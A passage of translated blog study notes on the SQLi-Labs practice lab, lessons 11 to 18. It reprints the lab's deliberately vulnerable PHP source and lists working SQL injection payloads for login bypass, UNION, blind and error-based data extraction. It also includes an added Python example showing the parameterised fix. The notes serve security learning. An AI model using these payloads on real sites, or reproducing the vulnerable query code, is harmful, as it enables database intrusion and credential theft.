SQLi-Labs Study Notes (Less 11-20)
Source: Internet   Editor: 程序博客网   Time: 2024/05/17 02:51
SQL (Baidu Baike): Structured Query Language, also called SQL, is fundamentally a programming language for working with databases. For beginners, a database is simply data storage on the client and server side. SQL manages databases through structured queries, relations, object-oriented programming and so on. Programming geeks keep producing software of this kind, such as MySQL, MS SQL, Oracle and PostgreSQL. Today there are programs that give us the ability to manage large databases through structured queries.
SQLi Labs download: https://github.com/Audi-1/sqli-labs
PS: some of the content below is excerpted from other people's experience and some I wrote myself; I've gathered experience from all over for everyone and to improve my own skills. If you have questions, please ask in the comments. Thanks.
Less-11: Error-based POST single-quote string injection
① First open the page: Welcome Dhakkan
② View the source:
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Less-11- Error Based- String</title>
</head>
<body bgcolor="#000000">
<div style=" margin-top:20px;color:#FFF; font-size:24px; text-align:center"> Welcome <font color="#FF0000"> Dhakkan </font><br></div>
<div align="center" style="margin:40px 0px 0px 520px;border:20px; background-color:#0CF; text-align:center; width:400px; height:150px;">
<div style="padding-top:10px; font-size:15px;">
<!--Form to post the data for sql injections Error based SQL Injection-->
<form action="" name="form1" method="post">
<div style="margin-top:15px; height:30px;">Username : <input type="text" name="uname" value=""/></div>
<div> Password : <input type="text" name="passwd" value=""/></div></br>
<div style=" margin-top:9px;margin-left:90px;"><input type="submit" name="submit" value="Submit" /></div>
</form>
</div>
</div>
<div style=" margin-top:10px;color:#FFF; font-size:23px; text-align:center">
<font size="6" color="#FFFF00">
<?php
//including the Mysql connect parameters.
include("../sql-connections/sql-connect.php");
error_reporting(0);

// take the variables
if(isset($_POST['uname']) && isset($_POST['passwd']))
{
    $uname=$_POST['uname'];
    $passwd=$_POST['passwd'];

    //logging the connection parameters to a file for analysis.
    $fp=fopen('result.txt','a');
    fwrite($fp,'User Name:'.$uname);
    fwrite($fp,'Password:'.$passwd."\n");
    fclose($fp);

    // connectivity
    @$sql="SELECT username, password FROM users WHERE username='$uname' and password='$passwd' LIMIT 0,1";
    $result=mysql_query($sql);
    $row = mysql_fetch_array($result);

    if($row)
    {
        //echo '<font color= "#0000ff">';
        echo "<br>";
        echo '<font color= "#FFFF00" font size = 4>';
        //echo " You Have successfully logged in\n\n " ;
        echo '<font size="3" color="#0000ff">';
        echo "<br>";
        echo 'Your Login name:'. $row['username'];
        echo "<br>";
        echo 'Your Password:' .$row['password'];
        echo "<br>";
        echo "</font>";
        echo "<br>";
        echo "<br>";
        echo '<img src="../images/flag.jpg" />';
        echo "</font>";
    }
    else
    {
        echo '<font color= "#0000ff" font size="3">';
        //echo "Try again looser";
        print_r(mysql_error());
        echo "</br>";
        echo "</br>";
        echo "</br>";
        echo '<img src="../images/slap.jpg" />';
        echo "</font>";
    }
}
?>
</font>
</div>
</body>
</html>
Let's see what kind of submission this is and which fields are submitted; open the network inspector to check.
The answer: a POST submission with fields uname and passwd. So we add a single quote to make it error:
Copy the whole part enclosed in single quotes from the error message, strip the single quote at each end, and you are left with:
test' LIMIT 0,1
So we can conclude it is single-quote injection. Next, build the POST body:
uname=user' or 1=1 #&passwd=user'
That yields the username and password; log in with them and it succeeds. Besides using a comment you can also close the single quote, but there is a question to discuss here; see the figure below.
Nothing shows up? Let's look at what the SQL statement is:
SELECT username,password From users WHERE username='user' or '1'='1' and password='user' LIMIT 0,1
First, AND has higher precedence than OR (AND is evaluated first), so '1'='1' and password='user' is evaluated first. Since no row in the users table has the password 'user', the right-hand side is false, the whole expression is false, and the statement becomes:
SELECT username, password FROM users WHERE username='user' or false
So what do we do? It doesn't work in uname, so try passwd, and that works.
The corresponding SQL statement is:
SELECT username,password FROM users WHERE username='user' and password='user' or '1'='1' LIMIT 0,1
The left side is FALSE and the right side of the OR is true, so it bypasses the check. In general, use a comment in the first login field (usually the username); in the second field (usually the password) either closing the quote or a comment works.
Next we can use a UNION query to look at the database information:
Build the following POST body:
uname=user&passwd=user' union select group_concat(char(32),username,char(32)),group_concat(char(32),password,char(32)) from users#
Blind injection also works, of course, but you'd need to write a script:
uname=user&passwd=user' or length(database())=8#
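As an added example (not from the original notes and not sqli-labs code), here is a Python/sqlite3 model of the Less-11 login query. It reproduces the precedence point made above: the page's payload user' or '1'='1 is swallowed when placed in uname, because AND binds tighter than OR, but matches every row when placed in passwd. It also shows the parameterised form of the same query, in which both placements return no row. The users table and its two rows are constructed for this example.

```python
"""Added example: sqlite3 model of the Less-11 login query (not sqli-labs code).
Shows why the quote-closing payload only works in the password field and how
bound parameters close the hole. Table rows are constructed for this example."""
import sqlite3


def make_db():
    """In-memory stand-in for the lab's security.users table (constructed rows)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)",
                     [(1, "Dumb", "Dumb"), (2, "admin", "s3cret")])
    return conn


def login_vulnerable(conn, uname, passwd):
    """Mirrors the lab's PHP: input is concatenated straight into the SQL text.
    Returns the first matching (username, password) row, or None."""
    sql = ("SELECT username, password FROM users "
           f"WHERE username='{uname}' and password='{passwd}' LIMIT 0,1")
    return conn.execute(sql).fetchone()


def login_safe(conn, uname, passwd):
    """Same query with bound parameters: quotes in the input are data, not SQL."""
    sql = ("SELECT username, password FROM users "
           "WHERE username=? and password=? LIMIT 0,1")
    return conn.execute(sql, (uname, passwd)).fetchone()


def run_cases():
    """Run the page's two payload placements against both versions.
    Keys: (field injected, version) -> matched username or None."""
    conn = make_db()
    payload = "user' or '1'='1"      # closes the quote, no comment needed
    cases = {
        # AND is evaluated first: '1'='1' and password='user' is false, so the
        # WHERE collapses to username='user' -> no row
        ("uname", "vulnerable"): login_vulnerable(conn, payload, "user"),
        # username='user' and password='user' is false, but or '1'='1' makes
        # every row match -> the first row of the table comes back
        ("passwd", "vulnerable"): login_vulnerable(conn, "user", payload),
        ("uname", "safe"): login_safe(conn, payload, "user"),
        ("passwd", "safe"): login_safe(conn, "user", payload),
        ("valid", "safe"): login_safe(conn, "admin", "s3cret"),
    }
    return {k: (row[0] if row else None) for k, row in cases.items()}


if __name__ == "__main__":
    for (field, version), user in run_cases().items():
        print(f"{field:7s} {version:10s} -> {user}")
```

Run it directly to print the five outcomes. The fix is the bound parameters in login_safe(): the driver sends the values separately from the statement text, so a quote in the input can never terminate the string literal. The column list and LIMIT 0,1 are kept as in the lab's query so the two functions differ only in how the input reaches the database.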
Less-12: Error-based double-quote POST string injection (variant)
① First open the page: Welcome Dhakkan
② View the source:
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Less-12- Error Based- Double quotes- String</title>
</head>
<body bgcolor="#000000">
<div style=" margin-top:20px;color:#FFF; font-size:24px; text-align:center"> Welcome <font color="#FF0000"> Dhakkan </font><br></div>
<div align="center" style="margin:40px 0px 0px 520px;border:20px; background-color:#0CF; text-align:center; width:400px; height:150px;">
<div style="padding-top:10px; font-size:15px;">
<!--Form to post the data for sql injections Error based SQL Injection-->
<form action="" name="form1" method="post">
<div style="margin-top:15px; height:30px;">Username : <input type="text" name="uname" value=""/></div>
<div> Password : <input type="text" name="passwd" value=""/></div></br>
<div style=" margin-top:9px;margin-left:90px;"><input type="submit" name="submit" value="Submit" /></div>
</form>
</div>
</div>
<div style=" margin-top:10px;color:#FFF; font-size:23px; text-align:center">
<font size="6" color="#FFFF00">
<?php
//including the Mysql connect parameters.
include("../sql-connections/sql-connect.php");
error_reporting(0);

// take the variables
if(isset($_POST['uname']) && isset($_POST['passwd']))
{
    $uname=$_POST['uname'];
    $passwd=$_POST['passwd'];

    //logging the connection parameters to a file for analysis.
    $fp=fopen('result.txt','a');
    fwrite($fp,'User Name:'.$uname."\n");
    fwrite($fp,'Password:'.$passwd."\n");
    fclose($fp);

    // connectivity
    $uname='"'.$uname.'"';
    $passwd='"'.$passwd.'"';
    @$sql="SELECT username, password FROM users WHERE username=($uname) and password=($passwd) LIMIT 0,1";
    $result=mysql_query($sql);
    $row = mysql_fetch_array($result);

    if($row)
    {
        //echo '<font color= "#0000ff">';
        echo "<br>";
        echo '<font color= "#FFFF00" font size = 4>';
        //echo " You Have successfully logged in " ;
        echo '<font size="3" color="#0000ff">';
        echo "<br>";
        echo 'Your Login name:'. $row['username'];
        echo "<br>";
        echo 'Your Password:' .$row['password'];
        echo "<br>";
        echo "</font>";
        echo "<br>";
        echo "<br>";
        echo '<img src="../images/flag.jpg" />';
        echo "</font>";
    }
    else
    {
        echo '<font color= "#0000ff" font size="3">';
        //echo "Try again looser";
        print_r(mysql_error());
        echo "</br>";
        echo "</br>";
        echo "</br>";
        echo '<img src="../images/slap.jpg" />';
        echo "</font>";
    }
}
?>
</font>
</div>
</body>
</html>
Try a single quote and a double quote first; from the error you can see whether quotes are used, or whether something else is added around the value.
Here it is clear the variable is wrapped in parentheses, so bypass directly. Build the POST body:
uname=abc&passwd=abc") or 1=1#
Less-13: POST single-quote variant double injection
① First open the page: Welcome Dhakkan
② View the source:
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Less-13- Double Injection- String- with twist</title>
</head>
<body bgcolor="#000000">
<div style=" margin-top:20px;color:#FFF; font-size:24px; text-align:center"> Welcome <font color="#FF0000"> Dhakkan </font><br></div>
<div align="center" style="margin:40px 0px 0px 520px;border:20px; background-color:#0CF; text-align:center; width:400px; height:150px;">
<div style="padding-top:10px; font-size:15px;">
<!--Form to post the data for sql injections Error based SQL Injection-->
<form action="" name="form1" method="post">
<div style="margin-top:15px; height:30px;">Username : <input type="text" name="uname" value=""/></div>
<div> Password : <input type="text" name="passwd" value=""/></div></br>
<div style=" margin-top:9px;margin-left:90px;"><input type="submit" name="submit" value="Submit" /></div>
</form>
</div>
</div>
<div style=" margin-top:10px;color:#FFF; font-size:23px; text-align:center">
<font size="6" color="#FFFF00">
<?php
//including the Mysql connect parameters.
include("../sql-connections/sql-connect.php");
error_reporting(0);

// take the variables
if(isset($_POST['uname']) && isset($_POST['passwd']))
{
    $uname=$_POST['uname'];
    $passwd=$_POST['passwd'];

    //logging the connection parameters to a file for analysis.
    $fp=fopen('result.txt','a');
    fwrite($fp,'User Name:'.$uname."\n");
    fwrite($fp,'Password:'.$passwd."\n");
    fclose($fp);

    // connectivity
    @$sql="SELECT username, password FROM users WHERE username=('$uname') and password=('$passwd') LIMIT 0,1";
    $result=mysql_query($sql);
    $row = mysql_fetch_array($result);

    if($row)
    {
        //echo '<font color= "#0000ff">';
        echo "<br>";
        echo '<font color= "#FFFF00" font size = 4>';
        //echo " You Have successfully logged in " ;
        echo '<font size="3" color="#0000ff">';
        echo "<br>";
        //echo 'Your Login name:'. $row['username'];
        //echo "<br>";
        //echo 'Your Password:' .$row['password'];
        //echo "<br>";
        echo "</font>";
        echo "<br>";
        echo "<br>";
        echo '<img src="../images/flag.jpg" />';
        echo "</font>";
    }
    else
    {
        echo '<font color= "#0000ff" font size="3">';
        //echo "Try again looser";
        print_r(mysql_error());
        echo "</br>";
        echo "</br>";
        echo "</br>";
        echo '<img src="../images/slap.jpg" />';
        echo "</font>";
    }
}
?>
</font>
</div>
</body>
</html>
Not much different; this was covered before. From the test we can tell it is the (' $id ') type, so
Less-14: POST double-quote double injection
① First open the page: Welcome Dhakkan
② View the source:
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Less-14- Double Injection- Double quotes- String</title>
</head>
<body bgcolor="#000000">
<div style=" margin-top:20px;color:#FFF; font-size:24px; text-align:center"> Welcome <font color="#FF0000"> Dhakkan </font><br></div>
<div align="center" style="margin:40px 0px 0px 520px;border:20px; background-color:#0CF; text-align:center; width:400px; height:150px;">
<div style="padding-top:10px; font-size:15px;">
<!--Form to post the data for sql injections Error based SQL Injection-->
<form action="" name="form1" method="post">
<div style="margin-top:15px; height:30px;">Username : <input type="text" name="uname" value=""/></div>
<div> Password : <input type="text" name="passwd" value=""/></div></br>
<div style=" margin-top:9px;margin-left:90px;"><input type="submit" name="submit" value="Submit" /></div>
</form>
</div>
</div>
<div style=" margin-top:10px;color:#FFF; font-size:23px; text-align:center">
<font size="6" color="#FFFF00">
<?php
//including the Mysql connect parameters.
include("../sql-connections/sql-connect.php");
error_reporting(0);

// take the variables
if(isset($_POST['uname']) && isset($_POST['passwd']))
{
    $uname=$_POST['uname'];
    $passwd=$_POST['passwd'];

    //logging the connection parameters to a file for analysis.
    $fp=fopen('result.txt','a');
    fwrite($fp,'User Name:'.$uname."\n");
    fwrite($fp,'Password:'.$passwd."\n");
    fclose($fp);

    // connectivity
    $uname='"'.$uname.'"';
    $passwd='"'.$passwd.'"';
    @$sql="SELECT username, password FROM users WHERE username=$uname and password=$passwd LIMIT 0,1";
    $result=mysql_query($sql);
    $row = mysql_fetch_array($result);

    if($row)
    {
        //echo '<font color= "#0000ff">';
        echo "<br>";
        echo '<font color= "#FFFF00" font size = 4>';
        //echo " You Have successfully logged in " ;
        echo '<font size="3" color="#0000ff">';
        echo "<br>";
        //echo 'Your Login name:'. $row['username'];
        //echo "<br>";
        //echo 'Your Password:' .$row['password'];
        //echo "<br>";
        echo "</font>";
        echo "<br>";
        echo "<br>";
        echo '<img src="../images/flag.jpg" />';
        echo "</font>";
    }
    else
    {
        echo '<font color= "#0000ff" font size="3">';
        //echo "Try again looser";
        print_r(mysql_error());
        echo "</br>";
        echo "</br>";
        echo "</br>";
        echo '<img src="../images/slap.jpg" />';
        echo "</font>";
    }
}
?>
</font>
</div>
</body>
</html>
A single quote produces no error but a double quote does; I'll skip the rest, you all understand.
Less-15: Boolean-based / time-delay single-quote POST blind injection
① First open the page: Welcome Dhakkan
② View the source:
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Less-15- Blind- Boolian Based- String</title>
</head>
<body bgcolor="#000000">
<div style=" margin-top:20px;color:#FFF; font-size:24px; text-align:center"> Welcome <font color="#FF0000"> Dhakkan </font><br></div>
<div align="center" style="margin:40px 0px 0px 520px;border:20px; background-color:#0CF; text-align:center; width:400px; height:150px;">
<div style="padding-top:10px; font-size:15px;">
<!--Form to post the data for sql injections Error based SQL Injection-->
<form action="" name="form1" method="post">
<div style="margin-top:15px; height:30px;">Username : <input type="text" name="uname" value=""/></div>
<div> Password : <input type="text" name="passwd" value=""/></div></br>
<div style=" margin-top:9px;margin-left:90px;"><input type="submit" name="submit" value="Submit" /></div>
</form>
</div>
</div>
<div style=" margin-top:10px;color:#FFF; font-size:23px; text-align:center">
<font size="6" color="#FFFF00">
<?php
//including the Mysql connect parameters.
include("../sql-connections/sql-connect.php");
error_reporting(0);

// take the variables
if(isset($_POST['uname']) && isset($_POST['passwd']))
{
    $uname=$_POST['uname'];
    $passwd=$_POST['passwd'];

    //logging the connection parameters to a file for analysis.
    $fp=fopen('result.txt','a');
    fwrite($fp,'User Name:'.$uname);
    fwrite($fp,'Password:'.$passwd."\n");
    fclose($fp);

    // connectivity
    @$sql="SELECT username, password FROM users WHERE username='$uname' and password='$passwd' LIMIT 0,1";
    $result=mysql_query($sql);
    $row = mysql_fetch_array($result);

    if($row)
    {
        //echo '<font color= "#0000ff">';
        echo "<br>";
        echo '<font color= "#FFFF00" font size = 4>';
        //echo " You Have successfully logged in\n\n " ;
        echo '<font size="3" color="#0000ff">';
        echo "<br>";
        //echo 'Your Login name:'. $row['username'];
        echo "<br>";
        //echo 'Your Password:' .$row['password'];
        echo "<br>";
        echo "</font>";
        echo "<br>";
        echo "<br>";
        echo '<img src="../images/flag.jpg" />';
        echo "</font>";
    }
    else
    {
        echo '<font color= "#0000ff" font size="3">';
        //echo "Try again looser";
        //print_r(mysql_error());
        echo "</br>";
        echo "</br>";
        echo "</br>";
        echo '<img src="../images/slap.jpg" />';
        echo "</font>";
    }
}
?>
</font>
</div>
</body>
</html>
Here neither a single nor a double quote produces an error, so use a time-delay function. First confirm that it is single-quote blind injection:
OK, correct.
Less-16: Boolean-based / time-delay double-quote POST blind injection
① First open the page: Welcome Dhakkan
② View the source:
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Less-16- Blind- Time Based- Double quotes- String</title>
</head>
<body bgcolor="#000000">
<div style=" margin-top:20px;color:#FFF; font-size:24px; text-align:center"> Welcome <font color="#FF0000"> Dhakkan </font><br></div>
<div align="center" style="margin:40px 0px 0px 520px;border:20px; background-color:#0CF; text-align:center; width:400px; height:150px;">
<div style="padding-top:10px; font-size:15px;">
<!--Form to post the data for sql injections Error based SQL Injection-->
<form action="" name="form1" method="post">
<div style="margin-top:15px; height:30px;">Username : <input type="text" name="uname" value=""/></div>
<div> Password : <input type="text" name="passwd" value=""/></div></br>
<div style=" margin-top:9px;margin-left:90px;"><input type="submit" name="submit" value="Submit" /></div>
</form>
</div>
</div>
<div style=" margin-top:10px;color:#FFF; font-size:23px; text-align:center">
<font size="6" color="#FFFF00">
<?php
//including the Mysql connect parameters.
include("../sql-connections/sql-connect.php");
error_reporting(0);

// take the variables
if(isset($_POST['uname']) && isset($_POST['passwd']))
{
    $uname=$_POST['uname'];
    $passwd=$_POST['passwd'];

    //logging the connection parameters to a file for analysis.
    $fp=fopen('result.txt','a');
    fwrite($fp,'User Name:'.$uname."\n");
    fwrite($fp,'Password:'.$passwd."\n");
    fclose($fp);

    // connectivity
    $uname='"'.$uname.'"';
    $passwd='"'.$passwd.'"';
    @$sql="SELECT username, password FROM users WHERE username=($uname) and password=($passwd) LIMIT 0,1";
    $result=mysql_query($sql);
    $row = mysql_fetch_array($result);

    if($row)
    {
        //echo '<font color= "#0000ff">';
        echo "<br>";
        echo '<font color= "#FFFF00" font size = 4>';
        //echo " You Have successfully logged in " ;
        echo '<font size="3" color="#0000ff">';
        echo "<br>";
        //echo 'Your Login name:'. $row['username'];
        echo "<br>";
        //echo 'Your Password:' .$row['password'];
        echo "<br>";
        echo "</font>";
        echo "<br>";
        echo "<br>";
        echo '<img src="../images/flag.jpg" />';
        echo "</font>";
    }
    else
    {
        echo '<font color= "#0000ff" font size="3">';
        echo "</br>";
        echo "</br>";
        //echo "Try again looser";
        //print_r(mysql_error());
        echo "</br>";
        echo "</br>";
        echo "</br>";
        echo '<img src="../images/slap.jpg" />';
        echo "</font>";
    }
}
?>
</font>
</div>
</body>
</html>
uname=a&passwd=a") or 1=1#  shows it is the double-quote variant. Test:
uname=a&passwd=a") or if(length(database())=7,1,sleep(5)) #
uname=a&passwd=a") or if(length(database())=8,1,sleep(5)) #
Less-17: Error-based UPDATE query POST injection
① First open the page: Welcome Dhakkan
② View the source:
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Less-17 Update Query- Error based - String</title>
</head>
<body bgcolor="#000000">
<div style=" margin-top:20px;color:#FFF; font-size:24px; text-align:center"><font color="#FFFF00"> [PASSWORD RESET] </br></font> <font color="#FF0000"> Dhakkan </font><br></div>
<div align="center" style="margin:20px 0px 0px 520px;border:20px; background-color:#0CF; text-align:center; width:400px; height:150px;">
<div style="padding-top:10px; font-size:15px;">
<!--Form to post the contents -->
<form action="" name="form1" method="post">
<div style="margin-top:15px; height:30px;">User Name : <input type="text" name="uname" value=""/> </div>
<div> New Password : <input type="text" name="passwd" value=""/></div></br>
<div style=" margin-top:9px;margin-left:90px;"><input type="submit" name="submit" value="Submit" /></div>
</form>
</div>
</div>
<div style=" margin-top:10px;color:#FFF; font-size:23px; text-align:center">
<font size="6" color="#FFFF00">
<?php
//including the Mysql connect parameters.
include("../sql-connections/sql-connect.php");
error_reporting(0);

function check_input($value)
{
    if(!empty($value))
    {
        // truncation (see comments)
        $value = substr($value,0,15);
    }
    // Stripslashes if magic quotes enabled
    if (get_magic_quotes_gpc())
    {
        $value = stripslashes($value);
    }
    // Quote if not a number
    if (!ctype_digit($value))
    {
        $value = "'" . mysql_real_escape_string($value) . "'";
    }
    else
    {
        $value = intval($value);
    }
    return $value;
}

// take the variables
if(isset($_POST['uname']) && isset($_POST['passwd']))
{
    //making sure uname is not injectable
    $uname=check_input($_POST['uname']);
    $passwd=$_POST['passwd'];

    //logging the connection parameters to a file for analysis.
    $fp=fopen('result.txt','a');
    fwrite($fp,'User Name:'.$uname."\n");
    fwrite($fp,'New Password:'.$passwd."\n");
    fclose($fp);

    // connectivity
    @$sql="SELECT username, password FROM users WHERE username= $uname LIMIT 0,1";
    $result=mysql_query($sql);
    $row = mysql_fetch_array($result);
    //echo $row;
    if($row)
    {
        //echo '<font color= "#0000ff">';
        $row1 = $row['username'];
        //echo 'Your Login name:'. $row1;
        $update="UPDATE users SET password = '$passwd' WHERE username='$row1'";
        mysql_query($update);
        echo "<br>";
        if (mysql_error())
        {
            echo '<font color= "#FFFF00" font size = 3 >';
            print_r(mysql_error());
            echo "</br></br>";
            echo "</font>";
        }
        else
        {
            echo '<font color= "#FFFF00" font size = 3 >';
            //echo " You password has been successfully updated " ;
            echo "<br>";
            echo "</font>";
        }
        echo '<img src="../images/flag1.jpg" />';
        //echo 'Your Password:' .$row['password'];
        echo "</font>";
    }
    else
    {
        echo '<font size="4.5" color="#FFFF00">';
        //echo "Bug off you Silly Dumb hacker";
        echo "</br>";
        echo '<img src="../images/slap1.jpg" />';
        echo "</font>";
    }
}
?>
</font>
</div>
</body>
</html>
Let's analyse the code. Roughly, after receiving username and password, it first queries the database by username and returns username and password, then replaces the stored password with the received value. The catch is that username is passed through a custom filter function check_input() when received. This function first checks for empty input and, if the value is non-empty, truncates username to its first 15 characters; then it uses the return value of get_magic_quotes_gpc() to decide whether magic_quotes_gpc is on or off:
With magic_quotes_gpc=on, string data going into and out of the database needs no addslashes() or stripslashes() processing and displays normally. If addslashes() is applied to input in this state, stripslashes() must be used on output to remove the extra backslashes.
With magic_quotes_gpc=off, addslashes() must be applied to input data, but stripslashes() is not needed on output, because addslashes() does not write the backslashes into the database; it only helps MySQL execute the SQL statement.
Finally, it uses ctype_digit() to check whether the username value is numeric; if it is a string, special characters are escaped with mysql_real_escape_string.
Clearly username is not easy to inject; the only option there is brute-forcing weak credentials such as admin. But the password is received with no filtering at all, so that is where we can work:
$uname=check_input($_POST['uname']); $passwd=$_POST['passwd'];
There are several approaches to injecting into UPDATE; let's summarize them together with INSERT and DELETE:
1. Subquery injection
The principle of subquery injection is double injection (double query). For update, delete and insert it is usually combined with an OR condition. Using this lesson as the example, for update we can construct the following statements.
Get the database name:
uname=admin&passwd=' or (select 1 from(select count(*),concat((select concat(0x7e,0x27,database(),0x27,0x7e)),floor(rand()*2))x from information_schema.tables group by x)a) where username='admin'%23
Get the table names:
uname=admin&passwd=' or (select 1 from(select count(*),concat((select group_concat(0x7e,0x27,table_name,0x27,0x7e) from information_schema.tables where table_schema='security'),floor(rand()*2))x from information_schema.tables group by x)a) where username='admin'%23
Get the column names:
uname=admin&passwd=' or (select 1 from(select count(*),concat((select group_concat(0x7e,0x27,column_name,0x27,0x7e) from information_schema.columns where table_schema='security' and table_name='users'),floor(rand()*2))x from information_schema.tables group by x)a) where username='admin'%23
Get the user data; for some reason this one does not succeed:
uname=admin&passwd=' or (select 1 from(select count(*),concat((select concat(0x27,id,0x7e,username,0x7e,password,0x27) from users limit 0,1),floor(rand()*2))x from information_schema.tables group by x)a) where username='admin'%23
If anyone knows how to fix it, please post the solution in the comments; it may be my MySQL version.
2. Via name_const():
name_const(name, value): returns the given value; when used to produce a result-set column, name_const() causes the column to take the given name.
But its usable range is limited: it only applies to some database versions above 5.0.12 that are still fairly old; on a current 5.7 don't bother... And I happen to be on a newer version, so the injection only shows the database version; querying anything else returns Incorrect arguments to NAME_CONST. So no screenshots here; just the payloads:
uname=admin&passwd=1' or (select * from (select(name_const(database(),1)),name_const(database(),1))a) where username='admin'%23
uname=admin&passwd=1' or (select * from (select(name_const((select group_concat(table_name) from information_schema.tables where table_schema='security'),1)),name_const((select group_concat(table_name) from information_schema.tables where table_schema='security'),1))a)
In general, update, insert and delete all share a fixed structure: ... or (select * from(select name_const((select ...),1),name_const((select...),1))a) ...
3. Via updatexml(): payload: updatexml(1,concat(0x7e,(version())),0)
The updatexml(xml_target, xpath_expr, new_xml) function:
The first parameter is the target XML
The second parameter is the XPath expression; see the W3C XPath tutorial
The third parameter is what the content matched by the XPath expression in the target XML is replaced with
XPath tutorial: http://www.w3school.com.cn/xpath/
The xml_target and new_xml parameters can be any number; the point here is to make the statement error.
First get the database name:
uname=admin&passwd=' or updatexml(1,concat(0x7e,concat(database()),0x7e),1)#
Get the table names:
uname=admin&passwd=' or updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security'),0x7e),1)#
Get the column names:
uname=admin&passwd=' or updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),0x7e),1)#
Get the user data; this also fails here:
uname=admin&passwd=' or updatexml(1,concat(0x7e,(select * from(select concat_ws(char(32,44,32),id,username,password) from users limit 0,1)a),0x7e),0)#
INSERT INTO users (id, username, password) VALUES (2,'Olivia' or updatexml(1,concat(0x7e,(select b.n from (select concat_ws(char(32,44,32),id,username,password) n from users u where u.id=1)b)),0) or'', 'Nervo');
4. Via extractvalue():
extractvalue(xml, value) is likewise an XPath function introduced in MySQL 5.1 for querying and modifying XML document data; when injecting, give any number as the first parameter. Straight to the payload:
uname=admin&passwd=' or extractvalue(1,concat(0x7e,(select * from(select concat_ws(char(32,44,32),id,username,password) from users limit 0,1)a),0x7e))%23
Less-18: Error-based User-Agent header POST injection
① First open the page: Welcome Dhakkan
② View the source:
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Less-18 Header Injection- Error Based- string</title>
</head>
<body bgcolor="#000000">
<div style=" margin-top:20px;color:#FFF; font-size:24px; text-align:center"> Welcome <font color="#FF0000"> Dhakkan </font><br></div>
<div align="center" style="margin:20px 0px 0px 510px;border:20px; background-color:#0CF; text-align:center;width:400px; height:150px;">
<div style="padding-top:10px; font-size:15px;">
<!--Form to post the contents -->
<form action="" name="form1" method="post">
<div style="margin-top:15px; height:30px;">Username : <input type="text" name="uname" value=""/> </div>
<div> Password : <input type="text" name="passwd" value=""/></div></br>
<div style=" margin-top:9px;margin-left:90px;"><input type="submit" name="submit" value="Submit" /></div>
</form>
</div>
</div>
<div style=" margin-top:10px;color:#FFF; font-size:23px; text-align:center">
<font size="3" color="#FFFF00">
<?php
//including the Mysql connect parameters.
include("../sql-connections/sql-connect.php");
error_reporting(0);

function check_input($value)
{
    if(!empty($value))
    {
        // truncation (see comments)
        $value = substr($value,0,20);
    }
    // Stripslashes if magic quotes enabled
    if (get_magic_quotes_gpc())
    {
        $value = stripslashes($value);
    }
    // Quote if not a number
    if (!ctype_digit($value))
    {
        $value = "'" . mysql_real_escape_string($value) . "'";
    }
    else
    {
        $value = intval($value);
    }
    return $value;
}

$uagent = $_SERVER['HTTP_USER_AGENT'];
$IP = $_SERVER['REMOTE_ADDR'];
echo "<br>";
echo 'Your IP ADDRESS is: ' .$IP;
echo "<br>";
//echo 'Your User Agent is: ' .$uagent;

// take the variables
if(isset($_POST['uname']) && isset($_POST['passwd']))
{
    $uname = check_input($_POST['uname']);
    $passwd = check_input($_POST['passwd']);
    /*
    echo 'Your Your User name:'. $uname;
    echo "<br>";
    echo 'Your Password:'. $passwd;
    echo "<br>";
    echo 'Your User Agent String:'. $uagent;
    echo "<br>";
    echo 'Your User Agent String:'. $IP;
    */

    //logging the connection parameters to a file for analysis.
    $fp=fopen('result.txt','a');
    fwrite($fp,'User Agent:'.$uname."\n");
    fclose($fp);

    $sql="SELECT users.username, users.password FROM users WHERE users.username=$uname and users.password=$passwd ORDER BY users.id DESC LIMIT 0,1";
    $result1 = mysql_query($sql);
    $row1 = mysql_fetch_array($result1);
    if($row1)
    {
        echo '<font color= "#FFFF00" font size = 3 >';
        $insert="INSERT INTO `security`.`uagents` (`uagent`, `ip_address`, `username`) VALUES ('$uagent', '$IP', $uname)";
        mysql_query($insert);
        //echo 'Your IP ADDRESS is: ' .$IP;
        echo "</font>";
        //echo "<br>";
        echo '<font color= "#0000ff" font size = 3 >';
